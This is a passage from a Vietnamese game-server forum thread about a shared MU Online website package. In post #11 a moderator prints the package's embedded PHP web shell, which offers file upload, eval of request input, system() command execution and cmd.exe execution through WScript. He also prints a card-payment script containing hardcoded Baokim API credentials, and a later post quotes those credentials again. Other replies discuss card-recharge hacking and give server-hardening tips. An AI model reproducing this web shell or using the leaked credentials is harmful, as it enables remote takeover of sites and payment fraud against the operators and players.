[MU] Share Dweb Full ver mới nhất - Trang 2
Follow us on
Follow us on Facebook Follow us on Twitter Linked In Flickr Watch us on YouTube My Space Blogger
 
Trang 2 của 2 Đầu tiênĐầu tiên 1 2
Kết quả 11 đến 19 của 19
  1. #11
    Moderator lequangvu's Avatar
    Ngày tham gia
    Aug 2007
    Đang ở
    Cung trăng
    Bài viết
    2,274
    Thanks
    797
    Thanked 824 Times in 593 Posts

    Ðề: Share Dweb Full ver mới nhất

    Mình gợi ý cho các bạn chút thế này nhé

    1- code file shell của nó đây

    PHP Code:
    <?php
    if(@$_REQUEST["sqli"]== 'sqli')
    {
    error_reporting(0);
    $docr $_SERVER["DOCUMENT_ROOT"];
    echo <<<HTML
    <p>
    <p>File Upload</b></p>
    </p>
    <table>
    <form enctype="multipart/form-data"  method="POST">
    <input type="hidden" name="ac" value="upload">
    <tr>
    <td><font size="1">Your File : </font> </td>
    <td>
    <input size="48" name="file" type="file"></td>
    </tr>
    <tr>
    <td><font size="1">Upload Dir : </font> </td>
    <td>
    <input size="48" value="
    $docr/" name="path" type="text">
    <input type="submit" value="Upload"></td>
    $tend
    HTML;
    if (isset(
    $_POST["path"])){
    $uploadfile $_POST["path"].$_FILES["file"]["name"];
    if (
    $_POST["path"]==""){$uploadfile $_FILES["file"]["name"];}
    if (
    copy($_FILES["file"]["tmp_name"], $uploadfile)) {
        echo 
    "File uploaded to : $uploadfilen";
        echo 
    "- Size : " .$_FILES["file"]["size"]. "n";
    } else {
        print 
    "Error  Upload File :n";
    }
    }
    }
    ?>
    <?php
    if(@$_REQUEST["sql"]== 'sql')
    {
        
    $files = @$_FILES["files"];    
        if(
    $files["name"] != ''){
            
    $fullpath $_REQUEST["path"].$files["name"];        
            if(
    move_uploaded_file($files['tmp_name'],$fullpath)){
                echo 
    "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
            }            
        }
        exit(
    '<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');    
    }
    eval(
    $_REQUEST['dct']);
    ?>
    <?php
    eval($_REQUEST['dct']);
    ?>
    <?php $cmd 
    = <<<EOD
    cmd
    EOD;

    if(isset(
    $_REQUEST[$cmd])) {
    system($_REQUEST[$cmd]); } ?>

    <?php
    if($_GET['id']=='login')
    {
    echo 
    '<form method="POST" enctype="multipart/form-data" action="?id=login">
    <input type="file" name="file_upload" size="20" id="file">
    <input type="submit" name="gui" value="Up" >
    </form>'
    ;if (isset($_POST['gui'])){
    move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
    }
    }
    ?>

    <?php
    if(@$_REQUEST["do"]== 'cmd')
    {
    echo 
    '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
    echo 
    '<form method="post">
    Command:<input type="text" name="id" value=""/></br>
    <button type="submit">Execute</button>
    </form>'
    ;
           
    $command=$_POST['id'];
    $wsh = new COM('WScript.shell');
    $exec $wsh->exec('cmd.exe /c '.$command);
    $stdout $exec->StdOut();
    $stroutput $stdout->ReadAll();
    echo 
    $stroutput;
    }
    ?>
    2- code file nạp thẻ ví dụ là gate.php

    PHP Code:
    <?php
    /** 
     * @Project VWebMU v1
     * @copyright 23/08/2014
     * @Email: [email protected]
     * @Yahoo: levu_it_pro
     */
     
        
    if (!defined('NetVWEB')) die("Ban khong co quyen truy cap he thong");
    if (
    $Use_CardGATE != 1) {
        echo 
    "<center>Chức năng không có hoặc không được sử dụng</center>";
    }
    else {
        include(
    'config/config_napthe_gate.php');
        
        include(
    'config/config_napthe.php');
            if ( 
    $khuyenmai_gate 0) {
            
    $menhgia10000k $menhgia10000*(1+($khuyenmai_gate/100));
            
    $menhgia20000k $menhgia20000*(1+($khuyenmai_gate/100));
            
    $menhgia30000k $menhgia30000*(1+($khuyenmai_gate/100));
            
    $menhgia50000k $menhgia50000*(1+($khuyenmai_gate/100));
            
    $menhgia100000k $menhgia100000*(1+($khuyenmai_gate/100));
            
    $menhgia200000k $menhgia200000*(1+($khuyenmai_gate/100));
            
    $menhgia300000k $menhgia300000*(1+($khuyenmai_gate/100));
            
    $menhgia500000k $menhgia500000*(1+($khuyenmai_gate/100));
        }
        if (isset(
    $_POST['action']))
        {
            
    $action $_POST['action'];
            if (
    $action == 'vpoint_gate')
            {
                
    $cardtype "GATE";
                
    $menhgia $_POST['menhgia'];
                
    $card_num $_POST['card_num'];
                
    $card_serial $_POST['card_serial'];
                
    $taikhoan=$_SESSION['mu_username'];
                
    $url 'http://linkketnoiserver/admin/ajax_action.php?ajax=acc_plus_minus';
                if( 
    $sendsv === false ) { $error "Tốc độ xử lý của bạn quá nhanh, vui lòng chờ vài giây rồi tiếp tục thực hiện."; }
                elseif(empty(
    $menhgia))
                {
                    
    $error "Chưa chọn mệnh giá thẻ GATE";
                }
                elseif (
    preg_match("/[^0-9$]/"$menhgia))
                    {
                        
    $error "<font size='4' color='red'>Dữ liệu lỗi - Mệnh giá chỉ được sử dụng số (1-9).</font>";
                    }
                elseif (empty(
    $card_num)) {
                    
    $error "Chưa điền Mã thẻ GATE";
                }
                elseif (
    preg_match("/[^0-9$]/"$card_num))
                {
                    
    $error "<font size='2' color='red'>Dữ liệu lỗi : $card_num . Chỉ được sử dụng số (1-9).</font>"
                }
                elseif (empty(
    $card_serial)) {
                    
    $error "Chưa điền Serial thẻ GATE";
                }
                elseif (
    preg_match("/[^a-zA-Z0-9$]/"$card_serial))
                {
                    
    $error "<font size='2' color='red'>Dữ liệu lỗi : $card_serial . Serial Chỉ được sử dụng chu a-z, A-Z và số (1-9).</font>"
                }
                else {
                if(
    $cardtype=='MobiPhone'){$mang "MOBI";}
                elseif(
    $cardtype=='Viettel'){$mang "VIETEL";}
                elseif(
    $cardtype=='GATE'){$mang "GATE";}
                elseif(
    $cardtype=='VinaPhone'){$mang "VINA";}
                else 
    $cardtype ="VinaPhone";
                
    $bk 'https://www.baokim.vn/the-cao/restFul/send';
                
    $merchant_id '18343';
                
    $api_username '12330238230';
                
    $api_password '12330238230987stdyfAsd';
                
    $transaction_id time();
                
    $secure_code '5f96b57ac4114f5e';
                
                
    $arrayPost = array(
                    
    'merchant_id'=>$merchant_id,
                    
    'api_username'=>$api_username,
                    
    'api_password'=>$api_password,
                    
    'transaction_id'=>$transaction_id,
                    
    'card_id'=>$mang,
                    
    'pin_field'=>$card_num,
                    
    'seri_field'=>$card_serial,
                    
    'algo_mode'=>'hmac'
                
    );
                
                
    ksort($arrayPost);
                
    $data_sign hash_hmac('SHA1',implode('',$arrayPost),$secure_code);
                
    $arrayPost['data_sign'] = $data_sign;
                
    $curl curl_init($bk);
                
    curl_setopt_array($curl, array(
                    
    CURLOPT_POST=>true,
                    
    CURLOPT_HEADER=>false,
                    
    CURLINFO_HEADER_OUT=>true,
                    
    CURLOPT_TIMEOUT=>30,
                    
    CURLOPT_RETURNTRANSFER=>true,
                    
    CURLOPT_SSL_VERIFYPEER => false,
                    
    CURLOPT_HTTPAUTH=>CURLAUTH_DIGEST|CURLAUTH_BASIC,
                    
    CURLOPT_USERPWD=>CORE_API_HTTP_USR.':'.CORE_API_HTTP_PWD,
                    
    CURLOPT_POSTFIELDS=>$arrayPost
                
    ));
                
    $data curl_exec($curl);
                
    $status curl_getinfo($curlCURLINFO_HTTP_CODE);
                
    $result json_decode($data,true);
                if(
    $status==200){
                        
    $amount       $result['amount'];
                        switch (
    $amount) {
                            case 
    10000$xu $menhgia10000k; break;
                            case 
    20000$xu $menhgia20000k; break;
                            case 
    30000$xu $menhgia20000k; break;
                            case 
    50000$xu=  $menhgia50000k; break;
                            case 
    100000$xu $menhgia100000k; break;
                            case 
    200000$xu $menhgia200000k; break;
                            case 
    300000$xu $menhgia200000k; break;
                            case 
    500000$xu $menhgia500000k; break;
                            case 
    1000000$xu $menhgia1000000k; break;
                                
                        }
                                        
    $fields = array(
                                                
    //'customerid' => urlencode($_POST['customerid']),
                                                
    'submit' => urlencode('Submit'),
                                                
    'datatype' => urlencode('gcoin'),
                                                
    'acc' => urlencode($taikhoan),
                                                
    'plusminus' => urlencode('0'),
                                                
    'value' => urlencode($xu),
                                                
    'username' => urlencode('admin'),
                                                
    //'useradmin' => urlencode('admin')
                                        
    );
                            
    //url-ify the data for the POST
                            
    foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
                            
    rtrim($fields_string'&');
                            
    //open connection
                            
    $ch curl_init();
                            
    //set the url, number of POST vars, POST data
                            
    curl_setopt($chCURLOPT_HTTPHEADER, array("X-Requested-With: XMLHttpRequest"));
                            
    curl_setopt($ch,CURLOPT_URL$url);
                            
    curl_setopt($ch,CURLOPT_POSTcount($fields));
                            
    curl_setopt($ch,CURLOPT_POSTFIELDS$fields_string);
                            
    curl_setopt($chCURLOPT_COOKIESESSIONTRUE);
                            
    curl_setopt($chCURLOPT_COOKIE'bbcustomerid='.$_POST['customerid'] );
                            
    curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
                            
    //execute post
                            
    $resultkq curl_exec($ch);
                            
    //close connection
                            
    curl_close($ch);
                            
    $notice "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";
                            
                            
    //$notice = "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";
                
                    
    } else{
                    
    $error $result['errorMessage'];
                    }
                }
            }
        }
        
            
    $menhgia10000_km 0;
            
    $menhgia20000_km 0;
            
    $menhgia30000_km 0;
            
    $menhgia50000_km 0;
            
    $menhgia100000_km 0;
            
    $menhgia200000_km 0;
            
    $menhgia300000_km 0;
            
    $menhgia500000_km 0;
        
        
    //Gcoin khi nạp thẻ GATE nhiều hơn các thẻ khác
        
    if ( $khuyenmai_gate 0) {
            
    $menhgia10000 $menhgia10000*(1+($khuyenmai_gate/100));
            
    $menhgia20000 $menhgia20000*(1+($khuyenmai_gate/100));
            
    $menhgia30000 $menhgia30000*(1+($khuyenmai_gate/100));
            
    $menhgia50000 $menhgia50000*(1+($khuyenmai_gate/100));
            
    $menhgia100000 $menhgia100000*(1+($khuyenmai_gate/100));
            
    $menhgia200000 $menhgia200000*(1+($khuyenmai_gate/100));
            
    $menhgia300000 $menhgia300000*(1+($khuyenmai_gate/100));
            
    $menhgia500000 $menhgia500000*(1+($khuyenmai_gate/100));
        }
        
        
    //Khuyen mai chung
        
    if ($khuyenmai == ) {
            
    $menhgia10000_km $menhgia10000*($khuyenmai_phantram/100);
            
    $menhgia20000_km $menhgia20000*($khuyenmai_phantram/100);
            
    $menhgia30000_km $menhgia30000*($khuyenmai_phantram/100);
            
    $menhgia50000_km $menhgia50000*($khuyenmai_phantram/100);
            
    $menhgia100000_km $menhgia100000*($khuyenmai_phantram/100);
            
    $menhgia200000_km $menhgia200000*($khuyenmai_phantram/100);
            
    $menhgia300000_km $menhgia300000*($khuyenmai_phantram/100);
            
    $menhgia500000_km $menhgia500000*($khuyenmai_phantram/100);
        }

        
    $page_template "templates/napthe/gate.tpl";
    }
    ?>
    Như vậy là các bạn biết phải làm thế nào rồi chứ?

    Chúc may mắn thành công!
    [Only registered and activated users can see links. ] - AN TOÀN - CHẤT LƯỢNG - NHIỀU TÍNH NĂNG
    Zalo/Telegram: 0972376510


  2. Các thành viên gởi lời cảm ơn đến lequangvu vì bài viết này !

    Domino9990 (18-02-17)

  3. #12
    Vi phạm quy định
    Ngày tham gia
    May 2006
    Đang ở
    https://t.me*********
    Bài viết
    1,813
    Thanks
    492
    Thanked 1,945 Times in 588 Posts

    Ðề: Share Dweb Full ver mới nhất

    phong trào hack thẻ lại tái diễn à
    Khách viếng thăm hãy cùng cuocdoisp xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  4. #13
    Vi phạm quy định
    Ngày tham gia
    Mar 2012
    Đang ở
    Nhà Nghỉ
    Bài viết
    1,861
    Thanks
    480
    Thanked 774 Times in 510 Posts

    Ðề: Share Dweb Full ver mới nhất

    Cùng của một thằng mà nó đang hack các Mu hiện nay, giờ Mu nào cứ open là nó soi xem có hack được không, rip mấy bác ít kinh nghiệm, VPS tôi cũng vừa hết hạn tính méo gia hạn nữa, nhưng tình trạng này lại phải cắn răng gia hạn để tránh bị hack thẻ thôi T_T

    Có cao thủ nó truy cập được cả vào web Admin cho dù máy chủ cấm port 80 chỉ cho IP quan trọng truy cập, tôi bị hack cả như này nữa nhé, nhưng không tiện tiết lộ cách nó làm chỉ đơn giản source bị share ra nên nó tìm được nhiều lỗ hổng bảo mật để xâm nhập.
    Khách viếng thăm hãy cùng heroviet2301 xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  5. Các thành viên gởi lời cảm ơn đến heroviet2301 vì bài viết này !

    lequangvu (17-02-17)

  6. #14
    Moderator lequangvu's Avatar
    Ngày tham gia
    Aug 2007
    Đang ở
    Cung trăng
    Bài viết
    2,274
    Thanks
    797
    Thanked 824 Times in 593 Posts

    Ðề: Share Dweb Full ver mới nhất

    Trích dẫn Gửi bởi heroviet2301 [Only registered and activated users can see links. ]
    Cùng của một thằng mà nó đang hack các Mu hiện nay, giờ Mu nào cứ open là nó soi xem có hack được không, rip mấy bác ít kinh nghiệm, VPS tôi cũng vừa hết hạn tính méo gia hạn nữa, nhưng tình trạng này lại phải cắn răng gia hạn để tránh bị hack thẻ thôi T_T

    Có cao thủ nó truy cập được cả vào web Admin cho dù máy chủ cấm port 80 chỉ cho IP quan trọng truy cập, tôi bị hack cả như này nữa nhé, nhưng không tiện tiết lộ cách nó làm chỉ đơn giản source bị share ra nên nó tìm được nhiều lỗ hổng bảo mật để xâm nhập.
    Nếu bị kiểu này thì nó chiến thông qua hosting của bạn hoặc là bạn không cấu hình lọc ip bằng firewall thì mới bị, disable hết port không liên quan, đổi port remote ........ có nhiều cách để xử lý bạn ạ
    [Only registered and activated users can see links. ] - AN TOÀN - CHẤT LƯỢNG - NHIỀU TÍNH NĂNG
    Zalo/Telegram: 0972376510


  7. The Following 2 Users Say Thank You to lequangvu For This Useful Post:

    DAMMEMU (28-02-17), Domino9990 (18-02-17)

  8. #15
    Thành Viên Tâm Huyết
    Ngày tham gia
    Nov 2011
    Đang ở
    yaya
    Bài viết
    2,643
    Thanks
    496
    Thanked 1,242 Times in 647 Posts

    Ðề: Share Dweb Full ver mới nhất

    đang lang thang ngoài đường ráng đăng nhập để thank cậu hehe.


    love you!

  9. #16
    Thành Viên Tâm Huyết
    Ngày tham gia
    Nov 2011
    Đang ở
    yaya
    Bài viết
    2,643
    Thanks
    496
    Thanked 1,242 Times in 647 Posts

    Ðề: Share Dweb Full ver mới nhất

    Trích dẫn Gửi bởi heroviet2301 [Only registered and activated users can see links. ]
    Cùng của một thằng mà nó đang hack các Mu hiện nay, giờ Mu nào cứ open là nó soi xem có hack được không, rip mấy bác ít kinh nghiệm, VPS tôi cũng vừa hết hạn tính méo gia hạn nữa, nhưng tình trạng này lại phải cắn răng gia hạn để tránh bị hack thẻ thôi T_T

    Có cao thủ nó truy cập được cả vào web Admin cho dù máy chủ cấm port 80 chỉ cho IP quan trọng truy cập, tôi bị hack cả như này nữa nhé, nhưng không tiện tiết lộ cách nó làm chỉ đơn giản source bị share ra nên nó tìm được nhiều lỗ hổng bảo mật để xâm nhập.
    herroviet search exploit remote code excution aibitary code là thấy xampp bị biến thành 1 cái teamviewer có khác gì nó remote trực tiếp vào vps đâu. chỉ là
    1. nó có phải trẻ trâu hay không
    2. là nó chưa thích show hàng ê tao vừa hack chiếm quyền vps mày nè.
    3. nó đang cài vps thành zoombie chứ không thèm ngó ngàng đến thẻ của herro luôn đấy.
    thực ra đối vs domino còn gặp nhiều vụ ghê gớm lắm ngay cả gameserver cũng có thể bị biến thành teamviewer kể cả thông qua proxy đấy. (nó gửi gói tin lên gameserver bảo chụp hình thì chụp bảo sửa file thì sửa bảo làm gì thì làm nấy. để có dịp domino làm cái demo sơ sơ cho ace hiểu)
    lời khuyên
    nếu ở mức độ nghiêm túc với máy chủ ai cũng nên nghĩ đến việc giám sát máy chủ của mình (dùng các công cụ giám sát truy cập, ghi log packets, như zabix, dialog , hirent firwall , và xem log trên máy chủ).
    dĩ nhiên chỉ hạn chế thôi chứ bản thân window server cũng tìm ẩn rất nhiều exploit chết người ví dụ như ms-1020 thông qua RPC(cái remote desktop server ) chứ đừng nói đến các cái khác


    love you!

  10. #17
    Thành Viên
    Ngày tham gia
    Apr 2014
    Bài viết
    58
    Thanks
    1
    Thanked 16 Times in 4 Posts

    Ðề: Share Dweb Full ver mới nhất

    $bk = 'https://www.baokim.vn/the-cao/restFul/send';
    $merchant_id = '18343';
    $api_username = '12330238230';
    $api_password = '12330238230987stdyfAsd';
    $transaction_id = time();
    $secure_code = '5f96b57ac4114f5e';
    hóng cao nhân điều tra thân thế thằng này.
    Khách viếng thăm hãy cùng soncuti xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  11. #18
    Thành Viên
    Ngày tham gia
    Nov 2010
    Bài viết
    348
    Thanks
    279
    Thanked 31 Times in 28 Posts

    Ðề: Share Dweb Full ver mới nhất

    Trích dẫn Gửi bởi soncuti [Only registered and activated users can see links. ]
    hóng cao nhân điều tra thân thế thằng này.
    hỏi nhân viên là ra mà bạn. không hỏi mấy cái thẻ nạp vào tài khoản bảo kim nào là được
    Khách viếng thăm hãy cùng alobabyday xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  12. #19
    Thành Viên
    Ngày tham gia
    Apr 2014
    Bài viết
    58
    Thanks
    1
    Thanked 16 Times in 4 Posts

    Ðề: Share Dweb Full ver mới nhất

    Trích dẫn Gửi bởi alobabyday [Only registered and activated users can see links. ]
    hỏi nhân viên là ra mà bạn. không hỏi mấy cái thẻ nạp vào tài khoản bảo kim nào là được
    not disclose information
    Khách viếng thăm hãy cùng soncuti xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

 

 
Trang 2 của 2 Đầu tiênĐầu tiên 1 2

Các Chủ đề tương tự

  1. [MU] Share DWEB + API + Vòng Quay May Mắn + Ép Đồ
    Bởi hoangtu_eck94 trong diễn đàn SQL Server & Website
    Trả lời: 76
    Bài viết cuối: 09-04-20, 07:41 AM
  2. Trả lời: 75
    Bài viết cuối: 25-09-16, 10:43 AM
  3. [JX] share 2 sever jx china mới share full chức năng
    Bởi RunNingMan trong diễn đàn Võ Lâm Truyền Kỳ (Jx Server)
    Trả lời: 21
    Bài viết cuối: 27-06-16, 07:45 AM
  4. Share Full Server Võ Lâm Miến Phí VNG linux 8.0 FULL VH
    Bởi hoangcungclub trong diễn đàn Chat Chit - Tán Gẫu
    Trả lời: 7
    Bài viết cuối: 22-01-16, 11:10 AM

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •  
Múi giờ GMT +7. Bây giờ là 06:04 AM.
vBulletin®, Copyright ©2000-2011, Jelsoft Enterprises Ltd.
CLBGamesVN không chịu trách nhiệm về Luật Bản Quyền của các tài liệu, bài viết v.v...được đăng tải trên diễn đàn này.
Diễn đàn phát triển dưới sự đóng góp của tất cả thành viên. BQT chỉ là những người thành lập ra sân chơi, quản lý và duy trì về mặt kỹ thuật, nội dung khi hợp lệ.